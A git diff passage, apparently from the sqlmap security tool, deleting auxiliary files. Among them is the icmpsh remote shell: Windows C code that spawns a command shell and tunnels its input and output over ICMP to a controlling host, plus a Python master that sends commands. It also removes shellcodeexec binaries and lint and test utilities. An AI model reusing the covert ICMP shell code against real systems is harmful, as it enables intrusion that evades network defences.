- - // parse command line options - for (opt = 1; opt < argc; opt++) { - if (argv[opt][0] == '-') { - switch(argv[opt][1]) { - case 'h': - usage(*argv); - return 0; - case 't': - if (opt + 1 < argc) { - target = argv[opt + 1]; - } - break; - case 'd': - if (opt + 1 < argc) { - delay = atol(argv[opt + 1]); - } - break; - case 'o': - if (opt + 1 < argc) { - timeout = atol(argv[opt + 1]); - } - break; - case 'r': - status = STATUS_SINGLE; - break; - case 'b': - if (opt + 1 < argc) { - max_blanks = atol(argv[opt + 1]); - } - break; - case 's': - if (opt + 1 < argc) { - max_data_size = atol(argv[opt + 1]); - } - break; - default: - printf("unrecognized option -%c\n", argv[1][0]); - usage(*argv); - return -1; - } - } - } - - if (!target) { - printf("you need to specify a host with -t. Try -h for more options\n"); - return -1; - } - ip_addr = to_ip(target); - - // don't spawn a shell if we're only sending a single test request - if (status != STATUS_SINGLE) { - status = spawn_shell(&pi, &pipe_read, &pipe_write); - } - - // create icmp channel - create_icmp_channel(&icmp_chan); - if (icmp_chan == INVALID_HANDLE_VALUE) { - printf("unable to create ICMP file: %u\n", GetLastError()); - return -1; - } - - // allocate transfer buffers - in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - if (!in_buf || !out_buf) { - printf("failed to allocate memory for transfer buffers\n"); - return -1; - } - memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - - // sending/receiving loop - blanks = 0; - do { - - switch(status) { - case STATUS_SINGLE: - // reply with a static string - out_buf_size = sprintf(out_buf, "Test1234\n"); - break; - case STATUS_PROCESS_NOT_CREATED: - // reply with error message - out_buf_size = sprintf(out_buf, "Process was not created\n"); - break; - default: - // read data from process via pipe - out_buf_size = 0; - if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { - if (out_buf_size > 0) { - out_buf_size = 0; - rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); - if (!rs && GetLastError() != ERROR_IO_PENDING) { - out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); - } - } - } else { - out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); - } - break; - } - - // send request/receive response - if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { - if (status == STATUS_OK) { - // write data from response back into pipe - WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); - } - blanks = 0; - } else { - // no reply received or error occured - blanks++; - } - - // wait between requests - Sleep(delay); - - } while (status == STATUS_OK && blanks < max_blanks); - - if (status == STATUS_OK) { - TerminateProcess(pi.hProcess, 0); - } - - return 0; -} - diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_ deleted file mode 100644 index a1eb995c..00000000 Binary files a/extra/icmpsh/icmpsh.exe_ and /dev/null differ diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py deleted file mode 100644 index 6e96952b..00000000 --- a/extra/icmpsh/icmpsh_m.py +++ /dev/null @@ -1,138 +0,0 @@ -#!/usr/bin/env python -# -# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in -# Perl by Nico Leidecker ) -# -# Copyright (c) 2010, Bernardo Damele A. G. -# -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . - -import os -import select -import socket -import subprocess -import sys - -def setNonBlocking(fd): - """ - Make a file descriptor non-blocking - """ - - import fcntl - - flags = fcntl.fcntl(fd, fcntl.F_GETFL) - flags = flags | os.O_NONBLOCK - fcntl.fcntl(fd, fcntl.F_SETFL, flags) - -def main(src, dst): - if subprocess.mswindows: - sys.stderr.write('icmpsh master can only run on Posix systems\n') - sys.exit(255) - - try: - from impacket import ImpactDecoder - from impacket import ImpactPacket - except ImportError: - sys.stderr.write('You need to install Python Impacket library first\n') - sys.exit(255) - - # Make standard input a non-blocking file - stdin_fd = sys.stdin.fileno() - setNonBlocking(stdin_fd) - - # Open one socket for ICMP protocol - # A special option is set on the socket so that IP headers are included - # with the returned data - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) - except socket.error: - sys.stderr.write('You need to run icmpsh master with administrator privileges\n') - sys.exit(1) - - sock.setblocking(0) - sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) - - # Create a new IP packet and set its source and destination addresses - ip = ImpactPacket.IP() - ip.set_ip_src(src) - ip.set_ip_dst(dst) - - # Create a new ICMP packet of type ECHO REPLY - icmp = ImpactPacket.ICMP() - icmp.set_icmp_type(icmp.ICMP_ECHOREPLY) - - # Instantiate an IP packets decoder - decoder = ImpactDecoder.IPDecoder() - - while True: - cmd = '' - - # Wait for incoming replies - if sock in select.select([ sock ], [], [])[0]: - buff = sock.recv(4096) - - if 0 == len(buff): - # Socket remotely closed - sock.close() - sys.exit(0) - - # Packet received; decode and display it - ippacket = decoder.decode(buff) - icmppacket = ippacket.child() - - # If the packet matches, report it to the user - if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): - # Get identifier and sequence number - ident = icmppacket.get_icmp_id() - seq_id = icmppacket.get_icmp_seq() - data = icmppacket.get_data_as_string() - - if len(data) > 0: - sys.stdout.write(data) - - # Parse command from standard input - try: - cmd = sys.stdin.readline() - except: - pass - - if cmd == 'exit\n': - return - - # Set sequence number and identifier - icmp.set_icmp_id(ident) - icmp.set_icmp_seq(seq_id) - - # Include the command as data inside the ICMP packet - icmp.contains(ImpactPacket.Data(cmd)) - - # Calculate its checksum - icmp.set_icmp_cksum(0) - icmp.auto_checksum = 1 - - # Have the IP packet contain the ICMP packet (along with its payload) - ip.contains(icmp) - - # Send it to the target host - sock.sendto(ip.get_packet(), (dst, 0)) - -if __name__ == '__main__': - if len(sys.argv) < 3: - msg = 'missing mandatory options. Execute as root:\n' - msg += './icmpsh-m.py \n' - sys.stderr.write(msg) - sys.exit(1) - - main(sys.argv[1], sys.argv[2]) diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py deleted file mode 100644 index 730a986c..00000000 --- a/extra/mssqlsig/update.py +++ /dev/null @@ -1,137 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import os -import re -import urllib2 -import urlparse - -from xml.dom.minidom import Document - -# Path to the XML file with signatures -MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") - -# Url to update Microsoft SQL Server XML versions file from -MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" - -def updateMSSQLXML(): - if not os.path.exists(MSSQL_XML): - errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML - print errMsg - return - - infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL - print infoMsg - - try: - req = urllib2.Request(MSSQL_VERSIONS_URL) - f = urllib2.urlopen(req) - mssqlVersionsHtmlString = f.read() - f.close() - except urllib2.URLError: - __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) - __mssqlHostname = __mssqlPath[1] - - warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname - warnMsg += " check your Internet connection and retry" - print warnMsg - - return - - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) - releasesCount = len(releases) - - # Create the minidom document - doc = Document() - - # Create the base element - root = doc.createElement("root") - doc.appendChild(root) - - for index in xrange(0, releasesCount): - release = releases[index] - - # Skip Microsoft SQL Server 6.5 because the HTML - # table is in another format - if release == "6.5": - continue - - # Create the base element - signatures = doc.createElement("signatures") - signatures.setAttribute("release", release) - root.appendChild(signatures) - - startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) - - if index == releasesCount - 1: - stopIdx = len(mssqlVersionsHtmlString) - else: - stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) - - mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("[7\.0|2000|2005|2008|2008 R2]*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) - - for servicePack, version in servicepackVersion: - if servicePack.startswith(" "): - servicePack = servicePack[1:] - if "/" in servicePack: - servicePack = servicePack[:servicePack.index("/")] - if "(" in servicePack: - servicePack = servicePack[:servicePack.index("(")] - if "-" in servicePack: - servicePack = servicePack[:servicePack.index("-")] - if "*" in servicePack: - servicePack = servicePack[:servicePack.index("*")] - if servicePack.startswith("+"): - servicePack = "0%s" % servicePack - - servicePack = servicePack.replace("\t", " ") - servicePack = servicePack.replace("No SP", "0") - servicePack = servicePack.replace("RTM", "0") - servicePack = servicePack.replace("TM", "0") - servicePack = servicePack.replace("SP", "") - servicePack = servicePack.replace("Service Pack", "") - servicePack = servicePack.replace(" element - signature = doc.createElement("signature") - signatures.appendChild(signature) - - # Create a element - versionElement = doc.createElement("version") - signature.appendChild(versionElement) - - # Give the elemenet some text - versionText = doc.createTextNode(version) - versionElement.appendChild(versionText) - - # Create a element - servicepackElement = doc.createElement("servicepack") - signature.appendChild(servicepackElement) - - # Give the elemenet some text - servicepackText = doc.createTextNode(servicePack) - servicepackElement.appendChild(servicepackText) - - # Save our newly created XML to the signatures file - mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") - doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") - mssqlXml.close() - - infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML - print infoMsg - -if __name__ == "__main__": - updateMSSQLXML() diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt deleted file mode 100644 index 717800aa..00000000 --- a/extra/runcmd/README.txt +++ /dev/null @@ -1,3 +0,0 @@ -Files in this folder can be used to compile auxiliary program that can -be used for running command prompt commands skipping standard "cmd /c" way. -They are licensed under the terms of the GNU Lesser General Public License. diff --git a/extra/runcmd/windows/README.txt b/extra/runcmd/windows/README.txt deleted file mode 100644 index b75508d5..00000000 --- a/extra/runcmd/windows/README.txt +++ /dev/null @@ -1,4 +0,0 @@ -Compile only the Release version because the Runtime library option -(Project Properties -> Configuration Properties -> C/C++ -> Code -Generation) is set to "Multi-threaded (/MT)", which statically links -everything into executable and doesn't compile Debug version at all. diff --git a/extra/runcmd/windows/runcmd.sln b/extra/runcmd/windows/runcmd.sln deleted file mode 100644 index 0770582d..00000000 --- a/extra/runcmd/windows/runcmd.sln +++ /dev/null @@ -1,20 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 9.00 -# Visual Studio 2005 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|Win32 = Debug|Win32 - Release|Win32 = Release|Win32 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal diff --git a/extra/runcmd/windows/runcmd/runcmd.cpp b/extra/runcmd/windows/runcmd/runcmd.cpp deleted file mode 100644 index ab40a0c2..00000000 --- a/extra/runcmd/windows/runcmd/runcmd.cpp +++ /dev/null @@ -1,46 +0,0 @@ -/* - runcmd - a program for running command prompt commands - Copyright (C) 2010 Miroslav Stampar - email: miroslav.stampar@gmail.com - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA -*/ - -#include -#include -#include -#include "stdafx.h" -#include - -using namespace std; -int main(int argc, char* argv[]) -{ - FILE *fp; - string cmd; - - for( int count = 1; count < argc; count++ ) - cmd += " " + string(argv[count]); - - fp = _popen(cmd.c_str(), "r"); - - if (fp != NULL) { - char buffer[BUFSIZ]; - - while (fgets(buffer, sizeof buffer, fp) != NULL) - fputs(buffer, stdout); - } - - return 0; -} diff --git a/extra/runcmd/windows/runcmd/runcmd.vcproj b/extra/runcmd/windows/runcmd/runcmd.vcproj deleted file mode 100644 index 928c7160..00000000 --- a/extra/runcmd/windows/runcmd/runcmd.vcproj +++ /dev/null @@ -1,225 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/extra/runcmd/windows/runcmd/stdafx.cpp b/extra/runcmd/windows/runcmd/stdafx.cpp deleted file mode 100644 index f5e34953..00000000 --- a/extra/runcmd/windows/runcmd/stdafx.cpp +++ /dev/null @@ -1,8 +0,0 @@ -// stdafx.cpp : source file that includes just the standard includes -// runcmd.pch will be the pre-compiled header -// stdafx.obj will contain the pre-compiled type information - -#include "stdafx.h" - -// TODO: reference any additional headers you need in STDAFX.H -// and not in this file diff --git a/extra/runcmd/windows/runcmd/stdafx.h b/extra/runcmd/windows/runcmd/stdafx.h deleted file mode 100644 index bdabbfb4..00000000 --- a/extra/runcmd/windows/runcmd/stdafx.h +++ /dev/null @@ -1,17 +0,0 @@ -// stdafx.h : include file for standard system include files, -// or project specific include files that are used frequently, but -// are changed infrequently -// - -#pragma once - -#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later. -#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows. -#endif - -#include -#include - - - -// TODO: reference additional headers your program requires here diff --git a/extra/safe2bin/README.txt b/extra/safe2bin/README.txt deleted file mode 100644 index 06400d6e..00000000 --- a/extra/safe2bin/README.txt +++ /dev/null @@ -1,17 +0,0 @@ -To use safe2bin.py you need to pass it the original file, -and optionally the output file name. - -Example: - -$ python ./safe2bin.py -i output.txt -o output.txt.bin - -This will create an binary decoded file output.txt.bin. For example, -if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will -be decoded to: " test 234 -newline" - -If you skip the output file name, general rule is that the binary -file names are suffixed with the string '.bin'. So, that means that -the upper example can also be written in the following form: - -$ python ./safe2bin.py -i output.txt diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/safe2bin/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py deleted file mode 100644 index f5a14725..00000000 --- a/extra/safe2bin/safe2bin.py +++ /dev/null @@ -1,130 +0,0 @@ -#!/usr/bin/env python - -""" -safe2bin.py - Simple safe(hex) to binary format converter - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii -import re -import string -import os -import sys - -from optparse import OptionError -from optparse import OptionParser - -# Regex used for recognition of hex encoded characters -HEX_ENCODED_CHAR_REGEX = r"(?P\\x[0-9A-Fa-f]{2})" - -# Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n) -SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" - -# Characters that don't need to be safe encoded -SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) - -# Prefix used for hex encoded values -HEX_ENCODED_PREFIX = r"\x" - -# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding) -HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__" - -# String used for temporary marking of slash characters -SLASH_MARKER = "__SLASH__" - -def safecharencode(value): - """ - Returns safe representation of a given basestring value - - >>> safecharencode(u'test123') - u'test123' - >>> safecharencode(u'test\x01\x02\xff') - u'test\\01\\02\\03\\ff' - """ - - retVal = value - - if isinstance(value, basestring): - if any(_ not in SAFE_CHARS for _ in value): - retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) - retVal = retVal.replace('\\', SLASH_MARKER) - - for char in SAFE_ENCODE_SLASH_REPLACEMENTS: - retVal = retVal.replace(char, repr(char).strip('\'')) - - retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) - - retVal = retVal.replace(SLASH_MARKER, "\\\\") - retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX) - elif isinstance(value, list): - for i in xrange(len(value)): - retVal[i] = safecharencode(value[i]) - - return retVal - -def safechardecode(value, binary=False): - """ - Reverse function to safecharencode - """ - - retVal = value - if isinstance(value, basestring): - retVal = retVal.replace('\\\\', SLASH_MARKER) - - while True: - match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) - else: - break - - for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: - retVal = retVal.replace(repr(char).strip('\''), char) - - retVal = retVal.replace(SLASH_MARKER, '\\') - - if binary: - if isinstance(retVal, unicode): - retVal = retVal.encode("utf8") - - elif isinstance(value, (list, tuple)): - for i in xrange(len(value)): - retVal[i] = safechardecode(value[i]) - - return retVal - -def main(): - usage = '%s -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') - - try: - parser.add_option('-i', dest='inputFile', help='Input file') - parser.add_option('-o', dest='outputFile', help='Output file') - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error('Missing the input file, -h for help') - - except (OptionError, TypeError), e: - parser.error(e) - - if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile - sys.exit(1) - - f = open(args.inputFile, 'r') - data = f.read() - f.close() - - if not args.outputFile: - args.outputFile = args.inputFile + '.bin' - - f = open(args.outputFile, 'wb') - f.write(safechardecode(data)) - f.close() - -if __name__ == '__main__': - main() diff --git a/extra/shellcodeexec/README.txt b/extra/shellcodeexec/README.txt deleted file mode 100644 index ad8fe349..00000000 --- a/extra/shellcodeexec/README.txt +++ /dev/null @@ -1,4 +0,0 @@ -Binary files in this folder are data files used by sqlmap on the target -system, but not executed on the system running sqlmap. They are licensed -under the terms of the GNU Lesser General Public License and their source -code is available on https://github.com/inquisb/shellcodeexec. diff --git a/extra/shellcodeexec/linux/shellcodeexec.x32_ b/extra/shellcodeexec/linux/shellcodeexec.x32_ deleted file mode 100644 index ec62f230..00000000 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x32_ and /dev/null differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x64_ b/extra/shellcodeexec/linux/shellcodeexec.x64_ deleted file mode 100644 index 10e8fea3..00000000 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x64_ and /dev/null differ diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ deleted file mode 100644 index c4204cce..00000000 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and /dev/null differ diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh deleted file mode 100755 index dc91d6b1..00000000 --- a/extra/shutils/blanks.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Removes trailing spaces from blank lines inside project files -find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py deleted file mode 100644 index a5562cec..00000000 --- a/extra/shutils/duplicates.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Removes duplicate entries in wordlist like files - -import sys - -if len(sys.argv) > 0: - items = list() - - with open(sys.argv[1], 'r') as f: - for item in f.readlines(): - item = item.strip() - try: - str.encode(item) - if item in items: - if item: - print item - else: - items.append(item) - except: - pass - - with open(sys.argv[1], 'w+') as f: - f.writelines("\n".join(items)) diff --git a/extra/shutils/pep8.sh b/extra/shutils/pep8.sh deleted file mode 100755 index 7abe562b..00000000 --- a/extra/shutils/pep8.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Runs pep8 on all python files (prerequisite: apt-get install pep8) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; diff --git a/extra/shutils/precommit-hook b/extra/shutils/precommit-hook deleted file mode 100644 index 4896f531..00000000 --- a/extra/shutils/precommit-hook +++ /dev/null @@ -1,22 +0,0 @@ -#!/bin/bash - -SETTINGS="../../lib/core/settings.py" - -declare -x SCRIPTPATH="${0}" - -FULLPATH=${SCRIPTPATH%/*}/$SETTINGS - -if [ -f $FULLPATH ] -then - LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"'); - declare -a LINE; - INCREMENTED=$(python -c "import re, sys; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); print sys.argv[1].replace(version, '.'.join(_))" "$LINE") - if [ -n "$INCREMENTED" ] - then - sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH - echo "Updated ${INCREMENTED} in ${FULLPATH}"; - else - echo "Something went wrong in VERSION increment" - exit 1 - fi -fi; diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh deleted file mode 100755 index 815b98e7..00000000 --- a/extra/shutils/pyflakes.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; diff --git a/extra/shutils/pylint.py b/extra/shutils/pylint.py deleted file mode 100644 index 440f638a..00000000 --- a/extra/shutils/pylint.py +++ /dev/null @@ -1,50 +0,0 @@ -#! /usr/bin/env python - -# Runs pylint on all python scripts found in a directory tree -# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html - -import os -import re -import sys - -total = 0.0 -count = 0 - -__RATING__ = False - -def check(module): - global total, count - - if module[-3:] == ".py": - - print "CHECKING ", module - pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') - for line in pout: - if re.match("E....:.", line): - print line - if __RATING__ and "Your code has been rated at" in line: - print line - score = re.findall("\d.\d\d", line)[0] - total += float(score) - count += 1 - -if __name__ == "__main__": - try: - print sys.argv - BASE_DIRECTORY = sys.argv[1] - except IndexError: - print "no directory specified, defaulting to current working directory" - BASE_DIRECTORY = os.getcwd() - - print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY - for root, dirs, files in os.walk(BASE_DIRECTORY): - if any(_ in root for _ in ("extra", "thirdparty")): - continue - for name in files: - filepath = os.path.join(root, name) - check(filepath) - - if __RATING__: - print "==" * 50 - print "%d modules found" % count - print "AVERAGE SCORE = %.02f" % (total / count) diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py deleted file mode 100644 index d5379405..00000000 --- a/extra/shutils/regressiontest.py +++ /dev/null @@ -1,165 +0,0 @@ -#!/usr/bin/env python - -# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -import codecs -import inspect -import os -import re -import smtplib -import subprocess -import sys -import time -import traceback - -from email.mime.multipart import MIMEMultipart -from email.mime.text import MIMEText - -sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe())))) - -from lib.core.revision import getRevisionNumber - -START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) -SQLMAP_HOME = "/opt/sqlmap" -REVISION = getRevisionNumber() - -SMTP_SERVER = "127.0.0.1" -SMTP_PORT = 25 -SMTP_TIMEOUT = 30 -FROM = "regressiontest@sqlmap.org" -#TO = "dev@sqlmap.org" -TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] -SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION) -TARGET = "debian" - -def prepare_email(content): - global FROM - global TO - global SUBJECT - - msg = MIMEMultipart() - msg["Subject"] = SUBJECT - msg["From"] = FROM - msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) - - msg.attach(MIMEText(content)) - - return msg - -def send_email(msg): - global SMTP_SERVER - global SMTP_PORT - global SMTP_TIMEOUT - - try: - s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT) - s.sendmail(FROM, TO, msg.as_string()) - s.quit() - # Catch all for SMTP exceptions - except smtplib.SMTPException, e: - print "Failure to send email: %s" % str(e) - -def failure_email(msg): - msg = prepare_email(msg) - send_email(msg) - sys.exit(1) - -def main(): - global SUBJECT - - content = "" - test_counts = [] - attachments = {} - - updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = updateproc.communicate() - - if stderr: - failure_email("Update of sqlmap failed with error:\n\n%s" % stderr) - - regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False) - stdout, stderr = regressionproc.communicate() - - if stderr: - failure_email("Execution of regression test failed with error:\n\n%s" % stderr) - - failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) - - for failed_test in failed_tests: - title = failed_test[0] - test_count = int(failed_test[1]) - parse = failed_test[3] if failed_test[3] else None - output_folder = failed_test[4] - traceback = False if failed_test[5] == "False" else bool(failed_test[5]) - detected = False if failed_test[6] else True - - test_counts.append(test_count) - - console_output_file = os.path.join(output_folder, "console_output") - log_file = os.path.join(output_folder, TARGET, "log") - traceback_file = os.path.join(output_folder, "traceback") - - if os.path.exists(console_output_file): - console_output_fd = codecs.open(console_output_file, "rb", "utf8") - console_output = console_output_fd.read() - console_output_fd.close() - attachments[test_count] = str(console_output) - - if os.path.exists(log_file): - log_fd = codecs.open(log_file, "rb", "utf8") - log = log_fd.read() - log_fd.close() - - if os.path.exists(traceback_file): - traceback_fd = codecs.open(traceback_file, "rb", "utf8") - traceback = traceback_fd.read() - traceback_fd.close() - - content += "Failed test case '%s' (#%d)" % (title, test_count) - - if parse: - content += " at parsing: %s:\n\n" % parse - content += "### Log file:\n\n" - content += "%s\n\n" % log - elif not detected: - content += " - SQL injection not detected\n\n" - else: - content += "\n\n" - - if traceback: - content += "### Traceback:\n\n" - content += "%s\n\n" % str(traceback) - - content += "#######################################################################\n\n" - - end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) - - if content: - content += end_string - SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts)) - - msg = prepare_email(content) - - for test_count, attachment in attachments.items(): - attachment = MIMEText(attachment) - attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count) - msg.attach(attachment) - - send_email(msg) - else: - SUBJECT = "Successful %s" % SUBJECT - msg = prepare_email("All test cases were successful\n\n%s" % end_string) - send_email(msg) - -if __name__ == "__main__": - log_fd = open("/tmp/sqlmapregressiontest.log", "wb") - log_fd.write("Regression test started at %s\n" % START_TIME) - - try: - main() - except Exception, e: - log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc())) - - log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())) - log_fd.close() diff --git a/extra/sqlharvest/__init__.py 